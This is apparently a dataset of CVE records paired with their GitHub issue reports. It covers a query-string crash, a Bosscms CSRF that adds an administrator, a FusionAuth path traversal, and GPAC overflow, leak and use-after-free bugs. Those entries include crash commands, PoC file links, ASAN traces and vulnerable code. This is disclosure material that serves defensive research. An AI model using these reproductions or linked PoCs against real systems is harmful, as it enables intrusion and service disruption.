Version: `v7.1.1` Crash occured when `# kun%ea%ba%5a%ba` is parsed by `queryString.parse` This hash is valid and should be parsed correctly as `{ ' kun%ea%ba%5a%ba': null }` For example in chrome's development tools' console the url `https://google.com# kun%ea%ba%5a%ba` can be parsed without problems: ``` const url = new URL("https://google.com# kun%ea%ba%5a%ba"); url ``` ![image](https://user-images.githubusercontent.com/44156690/186367650-140a9395-1165-4c31-a51a-12fbf9b301ab.png) ### Code to reproduce ``` const queryString = require('query-string'); const parsed = queryString.parse("# kun%ea%ba%5a%ba"); console.log(parsed); ``` ### Results `TypeError: decodeComponents(...).join is not a function`
TypeError: decodeComponents(...).join is not a function
https://api.github.com/repos/sindresorhus/query-string/issues/345/comments
12
2022-08-24T08:20:26Z
2022-12-02T08:04:34Z
https://github.com/sindresorhus/query-string/issues/345
1,349,056,021
345
4,438
CVE-2022-44937
2022-11-28T21:15:10.617
Bosscms v2.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) via the Add function under the Administrator List module.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/5497lvren/Zhenhao/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/5497lvren/Zhenhao/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:bosscms:bosscms:2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "3515006B-917D-420E-A026-3341F59BA61F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/5497lvren/Zhenhao/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "5497lvren", "Zhenhao" ]
Download link: https://gitee.com/Greenpeas/BOSSCMS/repository/archive/V2.0202210100920.zip version:v2.0.0 ![version:v2.0.0](https://user-images.githubusercontent.com/102774938/199420867-8b6304d5-3015-4937-8000-df6d14a9fb92.png) The issue in the background - > User - > administrator list -> add ![The issue in the background - > User - > administrator list -> add](https://user-images.githubusercontent.com/102774938/199421015-5d561c78-8079-4dfc-8d1d-8151c06b2e15.png) Save and dropthe packet ![Save and discard the packet](https://user-images.githubusercontent.com/102774938/199421268-da629b59-8c4b-4c5b-9f7e-68bed5208af3.png) ![](https://user-images.githubusercontent.com/102774938/199421790-3e491027-2d1a-4290-a508-ebeeb7f82e5f.png) Use CSRF Poc ![Use CSRF Poc](https://user-images.githubusercontent.com/102774938/199421876-913b8e1e-4562-40f7-8b09-3ec7aedb30d0.png) ![](https://user-images.githubusercontent.com/102774938/199421913-a9b23dca-ac93-4ef4-815b-9df2dd6ce496.png) Submit ![Submit](https://user-images.githubusercontent.com/102774938/199422028-012c66d9-f8ad-467b-80c6-8afef767441a.png) The admin user was successfully added ![The admin user was successfully added](https://user-images.githubusercontent.com/102774938/199422160-739aad43-6300-4839-a612-89990f9c9bbf.png)
Bosscms v2.0.0 a vulnerability, Cross-site request forgery(CSRF)
https://api.github.com/repos/5497lvren/Zhenhao/issues/1/comments
0
2022-11-02T07:04:23Z
2022-11-02T07:09:59Z
https://github.com/5497lvren/Zhenhao/issues/1
1,432,609,817
1
4,439
CVE-2022-45921
2022-11-28T21:15:10.747
FusionAuth before 1.41.3 allows a file outside of the application root to be viewed or retrieved using an HTTP request. To be specific, an attacker may be able to view or retrieve any file readable by the user running the FusionAuth process.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://fusionauth.io/docs/v1/tech/release-notes" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FusionAuth/fusionauth-issues/issues/1983" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Vendor Advisory" ], "url": "https://fusionauth.io/docs/v1/tech/release-notes" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/FusionAuth/fusionauth-issues/issues/1983" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fusionauth:fusionauth:*:*:*:*:*:*:*:*", "matchCriteriaId": "9E1FF535-F9FA-4576-99AA-F43450B7229E", "versionEndExcluding": "1.41.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.37.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/FusionAuth/fusionauth-issues/issues/1983
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "FusionAuth", "fusionauth-issues" ]
## Mitigate traversal attack ### Description A potential exists for a traversal attack. ### Affects versions Versions greater than or equal to `1.37.0` and less than `1.41.3` are affected. ### Related CVE-2022-45921 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-45921 ### Community guidelines All issues filed in this repository must abide by the [FusionAuth community guidelines](https://fusionauth.io/community/forum/topic/1000/code-of-conduct). ### Additional context Add any other context about the problem here.
Mitigate traversal attack - CVE-2022-45921
https://api.github.com/repos/FusionAuth/fusionauth-issues/issues/1983/comments
0
2022-11-28T15:28:05Z
2022-11-28T15:29:49Z
https://github.com/FusionAuth/fusionauth-issues/issues/1983
1,466,625,921
1,983
4,440
CVE-2022-45202
2022-11-29T04:15:11.207
GPAC v2.1-DEV-rev428-gcb8ae46c8-master was discovered to contain a stack overflow via the function dimC_box_read at isomedia/box_code_3gpp.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2296" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2296" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/2296
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
### Description Stack buffer overflow in function dimC_box_read at isomedia/box_code_3gpp.c:1070 ### System info ubuntu 20.04 lts ### version info: ··· /MP4Box -version MP4Box - GPAC version 2.1-DEV-rev428-gcb8ae46c8-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB ··· ### compile ./configure --enable-sanitizer make ### crash command: ./MP4Box -bt poc2 poc2 : [poc2.zip](https://github.com/gpac/gpac/files/9897264/poc2.zip) Here is stack overflow output by ASAN: ``` [AV1] Error parsing tile group, tile 0 start 58 + size 17220 exceeds OBU length 3 [AV1] Frame parsing did not consume the right number of bytes ! [AV1] could not parse AV1 OBU at position 42. Leaving parsing. [ISOBMFF] AV1ConfigurationBox overflow read 17 bytes, of box size 16. [iso file] Box "av1C" size 24 (start 20) invalid (read 25) ================================================================= ==22786==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff0c1f8a40 at pc 0x7f7bb77cb3ad bp 0x7fff0c1f85d0 sp 0x7fff0c1f7d78 READ of size 1031 at 0x7fff0c1f8a40 thread T0 #0 0x7f7bb77cb3ac in __interceptor_strdup ../../../../src/libsanitizer/asan/asan_interceptors.cc:443 #1 0x7f7bb43ee2dd in dimC_box_read isomedia/box_code_3gpp.c:1070 #2 0x7f7bb44aca33 in gf_isom_box_read isomedia/box_funcs.c:1866 #3 0x7f7bb44aca33 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #4 0x7f7bb44ade85 in gf_isom_parse_root_box isomedia/box_funcs.c:38 #5 0x7f7bb44d6efc in gf_isom_parse_movie_boxes_internal isomedia/isom_intern.c:378 #6 0x7f7bb44dd111 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:868 #7 0x7f7bb44dd111 in gf_isom_open_file isomedia/isom_intern.c:988 #8 0x55829fb43139 in mp4box_main /home/fuzz/gpac/applications/mp4box/mp4box.c:6211 #9 0x7f7bb1a59082 in __libc_start_main ../csu/libc-start.c:308 #10 0x55829fb1ecbd in _start (/home/fuzz/gpac/bin/gcc/MP4Box+0xa3cbd) Address 0x7fff0c1f8a40 is located in stack of thread T0 at offset 1056 in frame #0 0x7f7bb43edeff in dimC_box_read isomedia/box_code_3gpp.c:1048 This frame has 1 object(s): [32, 1056) 'str' (line 1049) <== Memory access at offset 1056 overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow ../../../../src/libsanitizer/asan/asan_interceptors.cc:443 in __interceptor_strdup Shadow bytes around the buggy address: 0x1000618370f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100061837100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100061837110: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100061837120: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100061837130: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x100061837140: 00 00 00 00 00 00 00 00[f3]f3 f3 f3 f3 f3 f3 f3 0x100061837150: f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00 0x100061837160: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100061837170: f1 f1 f1 f1 f1 f1 f8 f2 00 f2 f2 f2 00 00 f3 f3 0x100061837180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100061837190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==22786==ABORTING ``` ### Impact This is capable of causing crashes and allowing modification of stack memory which could lead to remote code execution. ### Code location ``` GF_Err dimC_box_read(GF_Box *s, GF_BitStream *bs) { char str[1024]; u32 i; GF_DIMSSceneConfigBox *p = (GF_DIMSSceneConfigBox *)s; ISOM_DECREASE_SIZE(p, 3); p->profile = gf_bs_read_u8(bs); p->level = gf_bs_read_u8(bs); p->pathComponents = gf_bs_read_int(bs, 4); p->fullRequestHost = gf_bs_read_int(bs, 1); p->streamType = gf_bs_read_int(bs, 1); p->containsRedundant = gf_bs_read_int(bs, 2); i=0; str[0]=0; while (i < GF_ARRAY_LENGTH(str)) { str[i] = gf_bs_read_u8(bs); if (!str[i]) break; i++; } ISOM_DECREASE_SIZE(p, i); **p->textEncoding = gf_strdup(str);** //line:1070 this issue i=0; str[0]=0; while (i < GF_ARRAY_LENGTH(str)) { str[i] = gf_bs_read_u8(bs); if (!str[i]) break; i++; } ISOM_DECREASE_SIZE(p, i); p->contentEncoding = gf_strdup(str); //line:1081 issue 2294 related return GF_OK; } ```
Stack buffer overflow in function dimC_box_read at isomedia/box_code_3gpp.c:1070
https://api.github.com/repos/gpac/gpac/issues/2296/comments
1
2022-10-31T01:21:46Z
2022-11-04T08:28:44Z
https://github.com/gpac/gpac/issues/2296
1,429,110,423
2,296
4,441
CVE-2022-45204
2022-11-29T04:15:11.253
GPAC v2.1-DEV-rev428-gcb8ae46c8-master was discovered to contain a memory leak via the function dimC_box_read at isomedia/box_code_3gpp.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2307" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2307" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/gpac/gpac/issues/2307
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
### Description Memory Leak in dimC_box_read at isomedia/box_code_3gpp.c:1060 ### System info ubuntu 20.04 lts ### version info: ``` ./MP4Box -version MP4Box - GPAC version 2.1-DEV-rev460-g9d963dc62-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DI ``` ### compile ./configure --enable-sanitizer make ### crash command: ./MP4Box -bt poc_ml poc : https://github.com/Janette88/test_pocs/blob/main/poc_ml Here is output by ASAN: ``` [ISOBMFF] AV1ConfigurationBox: read only 4 bytes (expected 16). [iso file] Box "av1C" (start 20) has 12 extra bytes [isom] not enough bytes in box dimC: 0 left, reading 1 (file isomedia/box_code_3gpp.c, line 1082) [iso file] Read Box "dimC" (start 44) failed (Invalid IsoMedia File) - skipping Error opening file /home/fuzz/test/poc_ml: Invalid IsoMedia File ================================================================= ==71539==ERROR: LeakSanitizer: detected memory leaks Direct leak of 2566 byte(s) in 1 object(s) allocated from: #0 0x7fe8c635f808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x7fe8c2ef8d39 in dimC_box_read isomedia/box_code_3gpp.c:1060 #2 0x7fe8c2fb75c3 in gf_isom_box_read isomedia/box_funcs.c:1866 #3 0x7fe8c2fb75c3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #4 0x7fe8c2fb8a15 in gf_isom_parse_root_box isomedia/box_funcs.c:38 #5 0x7fe8c2fe1a8c in gf_isom_parse_movie_boxes_internal isomedia/isom_intern.c:378 #6 0x7fe8c2fe7ca1 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:868 #7 0x7fe8c2fe7ca1 in gf_isom_open_file isomedia/isom_intern.c:988 #8 0x55c56a3e9139 in mp4box_main /home/fuzz/gpac/applications/mp4box/mp4box.c:6209 #9 0x7fe8c0558082 in __libc_start_main ../csu/libc-start.c:308 SUMMARY: AddressSanitizer: 2566 byte(s) leaked in 1 allocation(s). ``` ### code location: ``` GF_Err dimC_box_read(GF_Box *s, GF_BitStream *bs) { u32 i, msize; GF_DIMSSceneConfigBox *p = (GF_DIMSSceneConfigBox *)s; ISOM_DECREASE_SIZE(p, 3); p->profile = gf_bs_read_u8(bs); p->level = gf_bs_read_u8(bs); p->pathComponents = gf_bs_read_int(bs, 4); p->fullRequestHost = gf_bs_read_int(bs, 1); p->streamType = gf_bs_read_int(bs, 1); p->containsRedundant = gf_bs_read_int(bs, 2); char *str = gf_malloc(sizeof(char)*(p->size+1)); //line 1060 here p->size+1 = 2566 if (!str) return GF_OUT_OF_MEM; msize = (u32) p->size; str[msize] = 0; i=0; str[0]=0; while (i < msize) { ISOM_DECREASE_SIZE(p, 1); str[i] = gf_bs_read_u8(bs); if (!str[i]) break; i++; } if (i == msize) { gf_free(str); return GF_ISOM_INVALID_FILE; } p->textEncoding = gf_strdup(str); i=0; str[0]=0; while (i < msize) { ISOM_DECREASE_SIZE(p, 1); //line :1082 not enough bytes in box dimC: 0 left, reading 1 str[i] = gf_bs_read_u8(bs); if (!str[i]) break; i++; } if (i == msize) { gf_free(str); return GF_ISOM_INVALID_FILE; } p->contentEncoding = gf_strdup(str); gf_free(str); if (!p->textEncoding || !p->contentEncoding) return GF_OUT_OF_MEM; return GF_OK; } ``` ps: The issue could be verified using the poc in issue 2294 and 2296. The patch of issue 2294 and 2296 was not perfect because it still existed memory leak risk . ref: https://github.com/gpac/gpac/issues/2294 https://github.com/gpac/gpac/issues/2296
Memory Leak in dimC_box_read at isomedia/box_code_3gpp.c:1060
https://api.github.com/repos/gpac/gpac/issues/2307/comments
1
2022-11-07T12:35:15Z
2022-11-08T02:28:56Z
https://github.com/gpac/gpac/issues/2307
1,438,293,014
2,307
4,442
CVE-2022-45343
2022-11-29T16:15:09.293
GPAC v2.1-DEV-rev478-g696e6f868-master was discovered to contain a heap use-after-free via the Q_IsTypeOn function at /gpac/src/bifs/unquantize.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2315" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2315" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/gpac/gpac/issues/2315
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
# Description Heap use after free in Q_IsTypeOn at gpac/src/bifs/unquantize.c:175:12 # System info Ubuntu 20.04 lts # Version info ```shell MP4Box - GPAC version 2.1-DEV-rev478-g696e6f868-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer --enable-debug Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_FAAD GPAC_HAS_MAD GPAC_HAS_LIBA52 GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_FFMPEG GPAC_HAS_THEORA GPAC_HAS_VORBIS GPAC_HAS_XVID GPAC_HAS_LINUX_DVB ``` # compile ```shell ./configure --enable-sanitizer --enable-debug make ``` # crash command ```shell MP4Box -bt poc ``` # POC [POC-uaf](https://drive.google.com/file/d/1E3XcQkAlOWxENIQDDVOycrQT0JVje8HW/view?usp=sharing) # Crash output ```shell /home/zw/AFL_Fuzz_Datas/gpac/bin/gcc/MP4Box -bt poc [iso file] Unknown box type vref in parent dinf [iso file] Missing dref box in dinf [iso file] Unknown box type vref in parent dinf [iso file] Missing dref box in dinf MPEG-4 BIFS Scene Parsing ================================================================= ==1578219==ERROR: AddressSanitizer: heap-use-after-free on address 0x610000001ad4 at pc 0x7f8194636c1d bp 0x7fff91f55420 sp 0x7fff91f55418 READ of size 4 at 0x610000001ad4 thread T0 #0 0x7f8194636c1c in Q_IsTypeOn /home/zw/AFL_Fuzz_Datas/gpac/src/bifs/unquantize.c:175:12 #1 0x7f8194643390 in gf_bifs_dec_unquant_field /home/zw/AFL_Fuzz_Datas/gpac/src/bifs/unquantize.c:398:7 #2 0x7f81945890e1 in gf_bifs_dec_sf_field /home/zw/AFL_Fuzz_Datas/gpac/src/bifs/field_decode.c:84:7 #3 0x7f8194597e3f in BD_DecMFFieldList /home/zw/AFL_Fuzz_Datas/gpac/src/bifs/field_decode.c:327:8 #4 0x7f819459cd2f in gf_bifs_dec_field /home/zw/AFL_Fuzz_Datas/gpac/src/bifs/field_decode.c:564:9 #5 0x7f819459df3a in gf_bifs_dec_node_list /home/zw/AFL_Fuzz_Datas/gpac/src/bifs/field_decode.c:626:7 #6 0x7f81945965a8 in gf_bifs_dec_node /home/zw/AFL_Fuzz_Datas/gpac/src/bifs/field_decode.c:928:7 #7 0x7f8194598014 in BD_DecMFFieldList /home/zw/AFL_Fuzz_Datas/gpac/src/bifs/field_decode.c:330:15 #8 0x7f819459cd2f in gf_bifs_dec_field /home/zw/AFL_Fuzz_Datas/gpac/src/bifs/field_decode.c:564:9 #9 0x7f81945c0e7b in BM_ParseFieldReplace /home/zw/AFL_Fuzz_Datas/gpac/src/bifs/memory_decoder.c:734:21 #10 0x7f81945c4923 in BM_ParseReplace /home/zw/AFL_Fuzz_Datas/gpac/src/bifs/memory_decoder.c:847:10 #11 0x7f81945c7f12 in BM_ParseCommand /home/zw/AFL_Fuzz_Datas/gpac/src/bifs/memory_decoder.c:915:8 #12 0x7f81945c9706 in gf_bifs_flush_command_list /home/zw/AFL_Fuzz_Datas/gpac/src/bifs/memory_decoder.c:964:9 #13 0x7f81945cc012 in gf_bifs_decode_command_list /home/zw/AFL_Fuzz_Datas/gpac/src/bifs/memory_decoder.c:1044:3 #14 0x7f8195bc921f in gf_sm_load_run_isom /home/zw/AFL_Fuzz_Datas/gpac/src/scene_manager/loader_isom.c:303:10 #15 0x7f8195a86732 in gf_sm_load_run /home/zw/AFL_Fuzz_Datas/gpac/src/scene_manager/scene_manager.c:719:28 #16 0x577f50 in dump_isom_scene /home/zw/AFL_Fuzz_Datas/gpac/applications/mp4box/filedump.c:207:14 #17 0x53949f in mp4box_main /home/zw/AFL_Fuzz_Datas/gpac/applications/mp4box/mp4box.c:6369:7 #18 0x549801 in main /home/zw/AFL_Fuzz_Datas/gpac/applications/mp4box/mp4box.c:6834:1 #19 0x7f8192985082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #20 0x42ac5d in _start (/home/zw/AFL_Fuzz_Datas/gpac/bin/gcc/MP4Box+0x42ac5d) 0x610000001ad4 is located 148 bytes inside of 192-byte region [0x610000001a40,0x610000001b00) freed by thread T0 here: #0 0x4a5c52 in free (/home/zw/AFL_Fuzz_Datas/gpac/bin/gcc/MP4Box+0x4a5c52) #1 0x7f8193259324 in gf_free /home/zw/AFL_Fuzz_Datas/gpac/src/utils/alloc.c:165:2 #2 0x7f819378d74a in gf_node_free /home/zw/AFL_Fuzz_Datas/gpac/src/scenegraph/base_scenegraph.c:1622:2 #3 0x7f81938a38fc in QuantizationParameter_Del /home/zw/AFL_Fuzz_Datas/gpac/src/scenegraph/mpeg4_nodes.c:11981:2 #4 0x7f81938962b1 in gf_sg_mpeg4_node_del /home/zw/AFL_Fuzz_Datas/gpac/src/scenegraph/mpeg4_nodes.c:37743:3 #5 0x7f8193774108 in gf_node_del /home/zw/AFL_Fuzz_Datas/gpac/src/scenegraph/base_scenegraph.c:1904:59 #6 0x7f8193763dc2 in gf_node_unregister /home/zw/AFL_Fuzz_Datas/gpac/src/scenegraph/base_scenegraph.c:763:3 #7 0x7f8193772a1c in gf_node_try_destroy /home/zw/AFL_Fuzz_Datas/gpac/src/scenegraph/base_scenegraph.c:669:9 #8 0x7f81937ce9cc in gf_sg_command_del /home/zw/AFL_Fuzz_Datas/gpac/src/scenegraph/commands.c:72:7 #9 0x7f81945ca742 in gf_bifs_flush_command_list /home/zw/AFL_Fuzz_Datas/gpac/src/bifs/memory_decoder.c:990:5 #10 0x7f81945cc012 in gf_bifs_decode_command_list /home/zw/AFL_Fuzz_Datas/gpac/src/bifs/memory_decoder.c:1044:3 #11 0x7f8195bc921f in gf_sm_load_run_isom /home/zw/AFL_Fuzz_Datas/gpac/src/scene_manager/loader_isom.c:303:10 #12 0x7f8195a86732 in gf_sm_load_run /home/zw/AFL_Fuzz_Datas/gpac/src/scene_manager/scene_manager.c:719:28 #13 0x577f50 in dump_isom_scene /home/zw/AFL_Fuzz_Datas/gpac/applications/mp4box/filedump.c:207:14 #14 0x53949f in mp4box_main /home/zw/AFL_Fuzz_Datas/gpac/applications/mp4box/mp4box.c:6369:7 #15 0x549801 in main /home/zw/AFL_Fuzz_Datas/gpac/applications/mp4box/mp4box.c:6834:1 #16 0x7f8192985082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 previously allocated by thread T0 here: #0 0x4a5ebd in malloc (/home/zw/AFL_Fuzz_Datas/gpac/bin/gcc/MP4Box+0x4a5ebd) #1 0x7f8193259214 in gf_malloc /home/zw/AFL_Fuzz_Datas/gpac/src/utils/alloc.c:150:9 #2 0x7f819381fc84 in QuantizationParameter_Create /home/zw/AFL_Fuzz_Datas/gpac/src/scenegraph/mpeg4_nodes.c:12496:2 #3 0x7f819388ffa6 in gf_sg_mpeg4_node_new /home/zw/AFL_Fuzz_Datas/gpac/src/scenegraph/mpeg4_nodes.c:36871:10 #4 0x7f8193796799 in gf_node_new /home/zw/AFL_Fuzz_Datas/gpac/src/scenegraph/base_scenegraph.c:1996:51 #5 0x7f8194595f4a in gf_bifs_dec_node /home/zw/AFL_Fuzz_Datas/gpac/src/bifs/field_decode.c:900:15 #6 0x7f8194598014 in BD_DecMFFieldList /home/zw/AFL_Fuzz_Datas/gpac/src/bifs/field_decode.c:330:15 #7 0x7f819459cd2f in gf_bifs_dec_field /home/zw/AFL_Fuzz_Datas/gpac/src/bifs/field_decode.c:564:9 #8 0x7f81945c0e7b in BM_ParseFieldReplace /home/zw/AFL_Fuzz_Datas/gpac/src/bifs/memory_decoder.c:734:21 #9 0x7f81945c4923 in BM_ParseReplace 